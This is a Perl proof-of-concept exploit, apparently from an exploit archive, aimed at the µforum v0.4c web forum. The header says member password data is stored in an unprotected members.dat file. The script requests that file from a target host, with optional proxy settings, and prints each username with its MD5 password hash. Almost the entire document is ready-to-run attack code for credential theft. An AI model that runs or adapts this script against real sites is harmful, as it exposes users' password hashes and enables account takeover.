forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc
#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in .dat file no protected by a
.htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;
print STDOUT "\n+", '-' x 36, "+\n";
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT '+', '-' x 36, "+\n";
my($host,$path,$proxh,$proxu,$proxp);
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);
if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
if($host !~ /http/) {$host = 'http://'.$host;}
my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;
my $req = HTTP::Request->new('GET', $host);
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $res = $ua->request($req);
my $dat = $res->content;
my @tabl= split(/:/, $dat);
foreach (@tabl) {
if($_ =~ /"(.*)";a/){
print "\n".$1.'::';}
if($_ =~ /"([a-z0-9]{32})";i/){
print $1;}
}
print "\n";
exit(0);